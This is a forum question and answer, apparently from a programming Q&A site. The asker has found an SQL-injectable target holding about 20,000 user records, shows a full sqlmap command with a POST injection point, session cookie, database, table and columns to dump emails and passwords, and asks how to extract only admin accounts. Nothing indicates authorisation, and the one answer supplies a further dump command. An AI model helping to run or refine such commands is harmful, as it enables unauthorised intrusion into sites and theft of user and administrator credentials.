# How to dump specific data on SqlMap?

Tags: python, sql-injection, sqlmap

i have found the target that vuln with sqlmap, and there is **20k** of data

```
+-------------+----------------+--------------+
|  usertype   |      email     |   password   |
+-------------+----------------+--------------+
|  User       | example@ex.com |   12345678   |
|  Admin      | example@ex.com |   12345678   |
|  Admin      | example@ex.com |   12345678   |
|  User       | example@ex.com |   12345678   |
|  ...        |                |              |
+-------------+----------------+--------------+
```

iam using injection type `boolean-based blind - WHERE or HAVING clause`, now how can i dump the data that only `User Type` is Admin?

my command is

```
python sqlmap.py -u https://example.com --data "inject=0&data=1*" --cookie="user_session=example" -D user_data -T table_user -C usertype,email,password --dump --level 2 --risk 2
```

if using sql command that should be use the `WHERE` Statement, but it is not working using the `--os-shell`

Answer (score 0):

Dump data with specified file, I just ran this command:

```
--dump -D database -T table -C number, vorname, transfer
```